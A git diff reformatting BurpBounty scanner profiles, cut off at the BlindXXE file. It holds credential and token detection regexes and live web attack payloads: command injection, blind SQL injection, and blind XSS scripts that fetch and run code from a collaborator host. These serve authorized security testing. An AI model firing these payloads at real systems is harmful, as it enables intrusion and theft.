+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "AuthorizationBearerToken",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Authorization Bearer Token Found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Authorization_Bearer.bb b/profiles/Authorization_Bearer.bb
old mode 100644
new mode 100755
index a350c34..62c4b75
--- a/profiles/Authorization_Bearer.bb
+++ b/profiles/Authorization_Bearer.bb
@@ -1 +1,59 @@
-[{"Name":"Authorization_Bearer","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,bearer\\s*[a-zA-Z0-9_\\-\\.\u003d:_\\+\\/]+"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Authorization Bearer","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Authorization Bearer","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Authorization_Bearer",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,bearer\\s*[a-zA-Z0-9_\\-\\.\u003d:_\\+\\/]+"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Authorization Bearer",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Authorization Bearer",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Azure_Blob_Discovered.bb b/profiles/Azure_Blob_Discovered.bb
old mode 100644
new mode 100755
index 60f8382..66a5e4c
--- a/profiles/Azure_Blob_Discovered.bb
+++ b/profiles/Azure_Blob_Discovered.bb
@@ -1 +1,60 @@
-[{"Name":"Azure_Blob_Discovered","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,http(?:s):\\/\\/.[^\u003e\u003c\\\u0027\\\" \\n\\)]+.blob.core.windows.net\\/.[^\u003e\u003c\\\u0027\\\" \\n\\/)]+.\\/"],"Tags":["All","Cloud"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Azure Blob Url detected","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Azure Blob Url detected","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Azure_Blob_Discovered",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,http(?:s):\\/\\/.[^\u003e\u003c\\\u0027\\\" \\n\\)]+.blob.core.windows.net\\/.[^\u003e\u003c\\\u0027\\\" \\n\\/)]+.\\/"
+ ],
+ "Tags": [
+ "All",
+ "Cloud"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Azure Blob Url detected",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Azure Blob Url detected",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Basic_Auth_Credentials.bb b/profiles/Basic_Auth_Credentials.bb
old mode 100644
new mode 100755
index d990e86..f1749c7
--- a/profiles/Basic_Auth_Credentials.bb
+++ b/profiles/Basic_Auth_Credentials.bb
@@ -1 +1,59 @@
-[{"Name":"Basic_Auth_Credentials","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?\u003c\u003d:\\/\\/)[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\\.[a-zA-Z]+"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Basic Auth Credentials","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Basic_Auth_Credentials",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?\u003c\u003d:\\/\\/)[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\\.[a-zA-Z]+"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Basic Auth Credentials",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Bitcoin_Address.bb b/profiles/Bitcoin_Address.bb
old mode 100644
new mode 100755
index 5e70e1b..298577d
--- a/profiles/Bitcoin_Address.bb
+++ b/profiles/Bitcoin_Address.bb
@@ -1 +1,59 @@
-[{"Name":"Bitcoin_Address","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Bitcoin Address","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Bitcoin_Address",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Bitcoin Address",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/BlindRCE.bb b/profiles/BlindRCE.bb
old mode 100644
new mode 100755
index b68500e..406fb03
--- a/profiles/BlindRCE.bb
+++ b/profiles/BlindRCE.bb
@@ -1 +1,101 @@
-[{"Name":"BlindRCE","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":[" || ping -c 2 {BC}"," | ping -c 2 {BC}","; ping -c 2 {BC}"," \u0026\u0026 ping -c 2 {BC}"," \u0026 ping -c 2 {BC}"],"Encoder":[],"UrlEncode":true,"CharsToUrlEncode":"|;\u0026","Grep":[],"Tags":["Collaborator","RCE"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"BlindRCE","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"RCE with el payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "BlindRCE",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true, || ping -c 2 {BC}",
+ "true, | ping -c 2 {BC}",
+ "true,; ping -c 2 {BC}",
+ "true, \u0026\u0026 ping -c 2 {BC}",
+ "true, \u0026 ping -c 2 {BC}"
+ ],
+ "Encoder": [],
+ "UrlEncode": true,
+ "CharsToUrlEncode": "|;\u0026",
+ "Grep": [],
+ "Tags": [
+ "Collaborator",
+ "RCE",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 0,
+ "payloadPosition": 2,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "BlindRCE",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "RCE with el payloads: \u003cbr\u003e \u003cpayload\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/BlindSQLi-ContentLength.bb b/profiles/BlindSQLi-ContentLength.bb
old mode 100644
new mode 100755
index ffb220d..343a9f4
--- a/profiles/BlindSQLi-ContentLength.bb
+++ b/profiles/BlindSQLi-ContentLength.bb
@@ -1 +1,104 @@
-[{"Name":"BlindSQLi-ContentLength","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":[" or 1\u003d2"," or 1\u003d2-- "," or 1\u003d2#"," or 1\u003d2/*"," and 1\u003d2--"," and 1\u003d2"," and 1\u003d2#"," and 1\u003d2/*","\u0027 or \u00271\u0027\u003d\u00272","\u0027 and \u00271\u0027\u003d\u00272"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"3000","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":6,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"BlindSQLi-ContentLength","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Blind SQL injection found.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
+[
+ {
+ "ProfileName": "BlindSQLi-ContentLength",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true, or 1\u003d2",
+ "true, or 1\u003d2-- ",
+ "true, or 1\u003d2#",
+ "true, or 1\u003d2/*",
+ "true, and 1\u003d2--",
+ "true, and 1\u003d2",
+ "true, and 1\u003d2#",
+ "true, and 1\u003d2/*",
+ "true,\u0027 or \u00271\u0027\u003d\u00272",
+ "true,\u0027 and \u00271\u0027\u003d\u00272"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "3000",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 6,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 2,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "BlindSQLi-ContentLength",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Blind SQL injection found.",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/BlindSQLi-TimeBased.bb b/profiles/BlindSQLi-TimeBased.bb
index 9360ae9..256beb5 100755
--- a/profiles/BlindSQLi-TimeBased.bb
+++ b/profiles/BlindSQLi-TimeBased.bb
@@ -1 +1,107 @@
-[{"Name":"BlindSQLi-TimeBased","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u0027 and sleep 12--","\u0027 and sleep 12","\u0027 and sleep 12 and \u00271\u0027\u003d\u00271","\u0027 and sleep(12) and \u00271\u0027\u003d\u00271","\u0027 and sleep(12)--","\u0027 and sleep(12)",";sleep(12)--","\u0027 SELECT BENCHMARK(1200000,MD5(\u0027A\u0027));","\u0027 SELECT SLEEP(12); #","\u0027 WAITFOR DELAY \u00270:0:12\u0027--","\u0027 WAITFOR DELAY \u00270:0:12\u0027","\u0027 SELECT pg_sleep(12);"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["SQLi","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"10","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":5,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"BlindSQLi-TimeBased","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "BlindSQLi-TimeBased",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,\u0027 and sleep 12--",
+ "true,\u0027 and sleep 12",
+ "true,\u0027 and sleep 12 and \u00271\u0027\u003d\u00271",
+ "true,\u0027 and sleep(12) and \u00271\u0027\u003d\u00271",
+ "true,\u0027 and sleep(12)--",
+ "true,\u0027 and sleep(12)",
+ "true,;sleep(12)--",
+ "true,\u0027 SELECT BENCHMARK(1200000,MD5(\u0027A\u0027));",
+ "true,\u0027 SELECT SLEEP(12); #",
+ "true,\u0027 WAITFOR DELAY \u00270:0:12\u0027--",
+ "true,\u0027 WAITFOR DELAY \u00270:0:12\u0027",
+ "true,\u0027 SELECT pg_sleep(12);"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [],
+ "Tags": [
+ "SQLi",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 5,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 2,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "BlindSQLi-TimeBased",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/BlindXSS.bb b/profiles/BlindXSS.bb
index 3cad216..5f82027 100755
--- a/profiles/BlindXSS.bb
+++ b/profiles/BlindXSS.bb
@@ -1 +1,99 @@
-[{"Name":"BlindXSS","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003cscript\u003e$.getScript(\"//{BC}\")\u003c/script\u003e","\u003cscript\u003efunction b(){eval(this.responseText)};a\u003dnew XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//{BC}\");a.send();\u003c/script\u003e","\"\u003e\u003cscript src\u003dhttp://{BC}\u003e\u003c/script\u003e","javascript:eval(\u0027var a\u003ddocument.createElement(\\\u0027script\\\u0027);a.src\u003d\\\u0027http://{BC}\\\u0027;document.body.appendChild(a)\u0027)"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["XSS","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":0,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"BlindXSS","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Blind XSS found with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "BlindXSS",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,\u003cscript\u003e$.getScript(\"//{BC}\")\u003c/script\u003e",
+ "true,\u003cscript\u003efunction b(){eval(this.responseText)};a\u003dnew XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//{BC}\");a.send();\u003c/script\u003e",
+ "true,\"\u003e\u003cscript src\u003dhttp://{BC}\u003e\u003c/script\u003e",
+ "true,javascript:eval(\u0027var a\u003ddocument.createElement(\\\u0027script\\\u0027);a.src\u003d\\\u0027http://{BC}\\\u0027;document.body.appendChild(a)\u0027)"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [],
+ "Tags": [
+ "XSS",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 0,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "BlindXSS",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Blind XSS found with payloads: \u003cbr\u003e \u003cpayload\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/BlindXXE.bb b/profiles/BlindXXE.bb
old mode 100644
new mode 100755
index 01a171a..982b984
--- a/profiles/BlindXXE.bb
+++ b/profiles/BlindXXE.bb
@@ -1 +1,96 @@
